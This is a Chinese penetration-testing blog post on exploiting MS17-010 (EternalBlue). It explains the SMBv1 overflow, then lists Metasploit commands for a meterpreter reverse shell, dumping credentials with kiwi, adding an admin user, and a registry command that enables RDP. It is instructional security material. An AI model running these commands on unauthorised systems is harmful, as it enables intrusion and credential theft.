渗透测试-内网横向MS-17010利用方法总结
MS-17010总结
- 原理介绍
- 漏洞利用
- MSF
- Ladon
原理介绍
永恒之蓝(ms17-010)过TCP端口445和139
来利用SMBv1 SMB 协议 即 SMBv1 全名: Server Message Block
和NBT中的远程代码执行漏洞,
恶意代码会扫描开放445文件共享端口的Windows机器,
无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt
在处理FEA(File Extended Attributes)转换时,
在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。
然后会进行如下操作:
srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出
目前已知受影响的Windows 版本包括但不限于:
WindowsNT,2000、 XP、 2003、Vista、 7、 8,2008、2008 R2、2012 SP0。
漏洞利用
MSF
搜索ms17_010漏洞:search ms17_010
进入漏洞模块: use exploit/windows/smb/ms17_010_eternalblue
查看漏洞模块信息:info
设置攻击目标:set RHOSTS 172.16.7.180
查看可用的攻击payload:show payloads
选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp
设置接收信息的本地设备:set LHOST 172.16.7.95 and port
最后检查下当前的配置:show options
开始攻击:exploit
直接拿到目标的Shell,然后任意命令执行
获取用户密码
load kiwi
进程迁移
creds_all
shell切换到控制机dos界面
创建新用户
提升至管理员权限
输入 net localgroup administrators查看管理员都有谁
开启 远程桌面控制
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
rdesktop x.x.x.x:3389
Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
Ladon
http://k8gege.org/Ladon/cmddll.html
https://blog.csdn.net/k8gege/article/details/112253408
渗透测试-内网横向MS-17010利用方法总结相关推荐
- 渗透测试-内网横向移动专题
渗透测试-内网横向与提权专题 windows凭据窃取 Mimikatz Procdump Get-PassHashes.ps1 Windows远程连接和相关命令 IPC 利用条件 通过net来建立连接 ...
- 12.5、后渗透测试--内网主机屏幕截图
攻击主机: Kali 192.168.11.106 靶机:windows server 2008 r2 192.168.11.134 前提: 获得 meterpreter shell 操作屏幕的几种 ...
- 内网横向渗透之各种传递攻击
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透. ...
- 内网横向渗透神器-CS
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrik ...
- 细说内网横向工具WMIHACK
目录 1.前言 2. 基础知识 2.1 WMI简介 2.2 WMI体系结构 2.3 WMI的类与命名空间 2.4 查询WMI 2.5 管理WMI 2.6 WMI事件 3.工具分析 3.1 WMIHAC ...
- 内网渗透-Windows内网渗透
内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...
- 通过SOCKS代理渗透整个内网
通过SOCKS代理渗透整个内网 1.背景 经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它. 注意:本次环境在本地搭建,假设现在 ...
- 通过WIFI渗透到内网服务器和主机
测试目的:通过WIFI渗透到内网,并对内网进行扫描,收集设备信息,并尽可能的拿到多的权限. 测试设备:两台笔记本电脑 :PC1, PC2 ; 一个USB无线网卡RT5572; 一个无线AP 测试环境: ...
- 内网渗透-Linux内网渗透
系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...
- 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
内网安全:Cobalt Strike 工具 渗透多层内网主机. Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS.拥有多种协议主机上 ...
最新文章
- [转载 css]word-wrap,word-break,white-space,text-overflow的区别和用法
- 小牛带你nginx反向代理中神奇的斜线
- php ssl 不验证失败,php – 没有SSL的安全身份验证
- Java大新闻不断涌现:Java SE 6和OpenJDK
- 产品认识:一个可直接套用的产品分析框架(纯干货)
- @font-face 使用过程
- linux修改挂载目录名字,linux下修改mount挂载目录名
- apache服务器详细配置
- tensorflow2.0对应python版本_TensorFlow2.1.0最新版本安装详细教程
- 复化辛普森公式求二重积分matlab源码及例题
- archlinux i3wm flameshot使用
- VS2019插件VSIX开发
- php codeigniter 语言,CodeIgniter多语言实现方法详解
- 两轮差速机器人ROS下速度解算
- 使用 Swift 语言编程的优缺点
- Samba服务所使用的端口和协议
- 今天北京的天空是湛蓝的
- linux用不了wifi密码忘记了,极路由wifi密码忘记了怎么办?
- 相信美好-20200809
- 关于android手机桌面应用图标的角标通知